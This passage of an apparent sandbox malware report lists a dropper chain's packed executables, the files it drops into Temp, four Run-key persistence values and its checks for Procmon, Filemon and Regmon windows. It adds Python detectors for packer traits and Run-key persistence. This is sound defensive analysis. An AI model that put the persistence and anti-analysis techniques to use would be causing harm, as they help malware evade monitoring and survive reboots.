Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: random[1].exe.7.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name: .rsrc
Source: random[1].exe.7.dr Static PE information: section name: .idata
Source: random[1].exe.7.dr Static PE information: section name: vzkjjryc
Source: random[1].exe.7.dr Static PE information: section name: glqpzueu
Source: random[1].exe.7.dr Static PE information: section name: .taggant
Source: 8138ba21a1.exe.7.dr Static PE information: section name:
Source: 8138ba21a1.exe.7.dr Static PE information: section name: .rsrc
Source: 8138ba21a1.exe.7.dr Static PE information: section name: .idata
Source: 8138ba21a1.exe.7.dr Static PE information: section name: vzkjjryc
Source: 8138ba21a1.exe.7.dr Static PE information: section name: glqpzueu
Source: 8138ba21a1.exe.7.dr Static PE information: section name: .taggant
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: .rsrc
Source: random[1].exe0.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: fzxkvimr
Source: random[1].exe0.7.dr Static PE information: section name: ubuokytu
Source: random[1].exe0.7.dr Static PE information: section name: .taggant
Source: bd214fbd32.exe.7.dr Static PE information: section name:
Source: bd214fbd32.exe.7.dr Static PE information: section name: .rsrc
Source: bd214fbd32.exe.7.dr Static PE information: section name: .idata
Source: bd214fbd32.exe.7.dr Static PE information: section name:
Source: bd214fbd32.exe.7.dr Static PE information: section name: fzxkvimr
Source: bd214fbd32.exe.7.dr Static PE information: section name: ubuokytu
Source: bd214fbd32.exe.7.dr Static PE information: section name: .taggant
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name:
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name: .idata
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name:
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name: iropgfss
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name: gmutwtzh
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name: .taggant
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name:
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: .rsrc
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: .idata
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name:
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: fzxkvimr
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: ubuokytu
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_00422918 push ebx; mov dword ptr [esp], 7F2F5BD5h 6_2_00422953
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E4D3 push eax; mov dword ptr [esp], 5EFBDD75h 6_2_0041EEA6
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059BD53 push 712A873Ch; mov dword ptr [esp], esi 6_2_0059BD58
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059A05D push ebp; mov dword ptr [esp], ecx 6_2_0059A1DB
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_00420849 push ebx; mov dword ptr [esp], edi 6_2_00421F11
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0058D855 push ecx; mov dword ptr [esp], esi 6_2_0058D856
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_00421859 push 3B77CFB0h; mov dword ptr [esp], ebp 6_2_0042185E
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_00423859 push ebx; mov dword ptr [esp], eax 6_2_004250A4
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0058C847 push 02CB4EC1h; mov dword ptr [esp], eax 6_2_0058CF00
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059A071 push ebx; mov dword ptr [esp], ebp 6_2_0059A085
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059C071 push edx; mov dword ptr [esp], ebx 6_2_0059C47A
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059C071 push eax; mov dword ptr [esp], ebx 6_2_0059CEFA
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059C071 push ecx; mov dword ptr [esp], 3F8554E7h 6_2_0059F6C2
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E870 push 255CAAB2h; mov dword ptr [esp], ebx 6_2_0041E882
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E076 push ebx; retf 6_2_0041E077
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_00422875 push ecx; mov dword ptr [esp], ebx 6_2_00424AE0
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0058D065 push 6E925831h; mov dword ptr [esp], edi 6_2_0058D070
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E80E push eax; mov dword ptr [esp], 7CB7852Bh 6_2_0041E81D
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E80E push ecx; mov dword ptr [esp], esi 6_2_0041E84F
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E80E push edi; mov dword ptr [esp], edx 6_2_0041E868
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E80E push eax; mov dword ptr [esp], esp 6_2_0041F216
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059C00D push 74254063h; mov dword ptr [esp], esi 6_2_0059C012
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059C00D push 06A6C598h; mov dword ptr [esp], ebp 6_2_005A04FA
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059E83E push ecx; mov dword ptr [esp], ebp 6_2_0059E84B
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059E83E push 252B2D1Bh; mov dword ptr [esp], ebx 6_2_0059E853
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059E83E push 414E6051h; mov dword ptr [esp], esp 6_2_0059E862
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0059A02F push eax; mov dword ptr [esp], edi 6_2_0059B8C4
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0058C824 push ebx; mov dword ptr [esp], eax 6_2_0058C832
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041E8C3 push esi; mov dword ptr [esp], ebx 6_2_0041E8CD
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0041D0CC push 5026E434h; mov dword ptr [esp], edi 6_2_0041D0DF
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Code function: 6_2_0058F0C9 pushad ; iretd 6_2_0058F0E4
Source: file.exe Static PE information: section name: entropy: 7.9743511305048305
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name: entropy: 7.774389010907879
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name: entropy: 7.98429719456569
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name: iropgfss entropy: 7.952670628010361
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: fzxkvimr entropy: 7.9537968539439525
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.98429719456569
Source: skotes.exe.3.dr Static PE information: section name: iropgfss entropy: 7.952670628010361
Source: random[1].exe.7.dr Static PE information: section name: entropy: 7.9743511305048305
Source: 8138ba21a1.exe.7.dr Static PE information: section name: entropy: 7.9743511305048305
Source: random[1].exe0.7.dr Static PE information: section name: fzxkvimr entropy: 7.9537968539439525
Source: bd214fbd32.exe.7.dr Static PE information: section name: fzxkvimr entropy: 7.9537968539439525
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name: entropy: 7.98429719456569
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: section name: iropgfss entropy: 7.952670628010361
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: section name: fzxkvimr entropy: 7.9537968539439525
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File created: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001093001\num.exe
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File created: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe
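The static indicators listed under Data Obfuscation (sections that are both writable and executable, random eight-letter section names, section entropy close to 8.0, a stored CheckSum that does not match the computed one, and an entry point in .taggant rather than .text) can be reproduced with a short stdlib-only PE parser. The following is an added example and is not part of the Joe Sandbox report or of the sample: it builds a constructed 32-bit PE whose section layout mimics file.exe (the section contents, the random seed and every header value are invented for the demonstration) and runs the same checks over it. The CheckSum routine follows the documented imagehlp CheckSumMappedFile algorithm.

```python
"""Stdlib-only static PE triage for the packer indicators reported above."""
import math
import random
import struct

IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",
                  ".pdata", ".bss", ".tls", ".CRT", ".gfids", ".00cfg"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; random or encrypted data sits near 8.0, code around 6, zeros at 0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """CheckSumMappedFile: ones-complement sum of 32-bit words skipping the CheckSum
    field (assumed 4-byte aligned), folded to 16 bits, plus the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data: bytes) -> dict:
    """Minimal header walk (offsets are identical for PE32 and PE32+ for these fields)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                                   # IMAGE_OPTIONAL_HEADER
    sections = []
    for i in range(num_sections):
        base = opt + opt_size + 40 * i                    # IMAGE_SECTION_HEADER
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, base)
        flags = struct.unpack_from("<I", data, base + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr,
                         "vsize": vsize, "flags": flags, "raw": data[raw_ptr:raw_ptr + raw_size]})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum_offset": opt + 64,
            "stored_checksum": struct.unpack_from("<I", data, opt + 64)[0],
            "sections": sections}


def triage_pe(data: bytes, entropy_threshold: float = 7.5) -> list:
    """Return findings phrased like the report lines above."""
    pe = parse_pe(data)
    findings = []
    computed = pe_checksum(data, pe["checksum_offset"])
    if pe["stored_checksum"] != computed:
        findings.append(f"checksum mismatch: real 0x{pe['stored_checksum']:x} should be 0x{computed:x}")
    for s in pe["sections"]:
        name = s["name"] or "<unnamed>"
        if s["flags"] & IMAGE_SCN_MEM_EXECUTE and s["flags"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {name} is writable and executable")
        if s["name"] not in STANDARD_NAMES:
            findings.append(f"non-standard section name {name}")
        entropy = shannon_entropy(s["raw"])
        if entropy > entropy_threshold:
            findings.append(f"section {name} entropy {entropy:.2f} (packed or encrypted payload)")
        if s["vaddr"] <= pe["entry_rva"] < s["vaddr"] + max(s["vsize"], len(s["raw"])) and s["name"] != ".text":
            findings.append(f"entry point in section {name}")
    return findings


def with_correct_checksum(data: bytes) -> bytes:
    """Write the computed CheckSum back, as a clean linker run would have."""
    pe = parse_pe(data)
    buf = bytearray(data)
    struct.pack_into("<I", buf, pe["checksum_offset"], pe_checksum(data, pe["checksum_offset"]))
    return bytes(buf)


def build_sample_pe(seed: int = 1540733) -> bytes:
    """Constructed PE32 mimicking file.exe's section layout (invented bytes, not the sample):
    unnamed RWX section of random data, .rsrc/.idata, two random-named RWX sections and a
    .taggant section holding the entry point. CheckSum is left at 0."""
    rng = random.Random(seed)
    noise = lambda n: bytes(rng.getrandbits(8) for _ in range(n))
    rwx = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    rw = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    specs = [("", rwx, noise(0x1000)), (".rsrc", rw, b"\0" * 0x200),
             (".idata", rw, b"KERNEL32.dll\0LoadLibraryA\0GetProcAddress\0"),
             ("vzkjjryc", rwx, noise(0x1000)), ("glqpzueu", rwx, noise(0x400)),
             (".taggant", rwx, b"\x60\xe8\0\0\0\0\x5d" + b"\x90" * 25)]   # pushad; call $+5; pop ebp
    headers_size, rva, raw_ptr, entry_rva, table, body = 0x400, 0x1000, 0x400, 0, b"", b""
    for name, flags, content in specs:
        raw_size = -(-len(content) // 0x200) * 0x200          # FileAlignment 0x200
        if name == ".taggant":
            entry_rva = rva
        table += struct.pack("<8sIIIIIIHHI", name.encode(), raw_size, rva, raw_size, raw_ptr, 0, 0, 0, 0, flags)
        body += content.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        rva += -(-raw_size // 0x1000) * 0x1000                 # SectionAlignment 0x1000
    dos = struct.pack("<2s58xI", b"MZ", 0x80).ljust(0x80, b"\0")
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, 0xE0, 0x0102)
    opt_hdr = struct.pack("<HBB9I6H4IHH6I", 0x10B, 14, 0, 0x1000, 0x1000, 0, entry_rva, 0x1000, 0x2000,
                          0x400000, 0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0, rva, headers_size, 0,
                          2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    headers = (dos + b"PE\0\0" + file_hdr + opt_hdr + table).ljust(headers_size, b"\0")
    return headers + body


if __name__ == "__main__":
    for line in triage_pe(build_sample_pe()):
        print(line)
```

A CheckSum of 0 or a mismatch on its own is weak evidence, since many unsigned builds never set the field; what makes the files in this report stand out is the combination with writable-and-executable sections of near-maximal entropy and an entry point in a section other than .text, which is the shape of a runtime unpacker rather than of compiled code. Dropping the threshold below 7.5 increases false positives from compressed resources in .rsrc, so check entropy per section rather than for the whole file.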

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bd214fbd32.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8138ba21a1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 136916b3ff.exe
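All four Run values that skotes.exe creates name binaries it dropped under %LOCALAPPDATA%\Temp (the drop paths are listed under Data Obfuscation), which is what the "New RUN Key Pointing to Suspicious Folder" Sigma detection and the "Creates multiple autostart registry keys" signature in the summary key on. The following added example, not part of the report, runs that logic over Sysmon Event ID 13 (RegistryEvent SetValue) records. The records are constructed for the demonstration: the SID placeholder, the Details values and the benign and non-Run control records are invented, and the suspicious-folder list and the threshold of three values per writer are the author's choices rather than the exact Sigma rule text.

```python
"""Run-key persistence detection over Sysmon Event ID 13 (SetValue) records."""
import re
from collections import defaultdict

RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\(?P<value>[^\\]+)$", re.IGNORECASE)

# Folders a legitimate installer rarely points an autostart entry at (lower-case).
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\",
                   "\\programdata\\", ":\\temp\\", "\\windows\\temp\\", "%temp%", "%tmp%", "%appdata%")

# Constructed records modelled on the skotes.exe behaviour above (SID and Details invented).
SID = r"HKU\S-1-5-21-0-0-0-1001"
RUN = r"\Software\Microsoft\Windows\CurrentVersion\Run"
WRITER = r"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": WRITER, "TargetObject": SID + RUN + r"\num.exe",
     "Details": r"C:\Users\user\AppData\Local\Temp\1001093001\num.exe"},
    {"EventID": 13, "Image": WRITER, "TargetObject": SID + RUN + r"\bd214fbd32.exe",
     "Details": r"C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe"},
    {"EventID": 13, "Image": WRITER, "TargetObject": SID + RUN + r"\8138ba21a1.exe",
     "Details": r"C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe"},
    {"EventID": 13, "Image": WRITER, "TargetObject": SID + RUN + r"\136916b3ff.exe",
     "Details": r"C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe"},
    # benign control: installer registering a tray app under Program Files, quoted with arguments
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\Setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r'"C:\Program Files\Vendor\tray.exe" /background'},
    # non-Run value and a key-creation event (ID 12): both ignored
    {"EventID": 13, "Image": WRITER, "Details": "DWORD (0x00000002)",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"},
    {"EventID": 12, "Image": WRITER, "TargetObject": SID + RUN, "Details": ""},
]


def extract_image_path(details: str) -> str:
    """Executable path from Run value data: quoted form with arguments, or a bare path."""
    s = details.strip()
    m = re.match(r'"([^"]+)"', s) or re.match(
        r"(.+?\.(?:exe|dll|bat|cmd|vbs|js|ps1))(?:\s|$)", s, re.IGNORECASE)
    return m.group(1) if m else s.split(" ", 1)[0]


def detect_run_key_persistence(events, multi_threshold=3):
    """Two rules: Run value pointing into a suspicious folder; one writer setting many values."""
    findings, values_per_writer = [], defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 13:                  # only SetValue carries the data
            continue
        m = RUN_KEY_RE.search(ev["TargetObject"])
        if not m:
            continue
        value, path = m["value"], extract_image_path(ev["Details"])
        values_per_writer[ev["Image"]].add(value)
        if any(d in path.lower() for d in SUSPICIOUS_DIRS):
            findings.append({"rule": "run_key_suspicious_folder", "writer": ev["Image"],
                             "value": value, "target": path})
    for writer, values in values_per_writer.items():
        if len(values) >= multi_threshold:
            findings.append({"rule": "multiple_autostart_entries", "writer": writer,
                             "count": len(values), "values": sorted(values)})
    return findings


if __name__ == "__main__":
    for f in detect_run_key_persistence(SAMPLE_EVENTS):
        print(f)
```

On the constructed records the four skotes.exe values fire the folder rule individually and the writer fires the multiple-entries rule once; the Program Files entry and the Explorer value produce nothing. Parsing the value data before matching matters because autostart data is frequently quoted or carries arguments, and a naive substring match on the raw Details string would still work here but would misattribute the target when the suspicious path appears only in an argument.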
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: PROCMON_WINDOW_CLASS
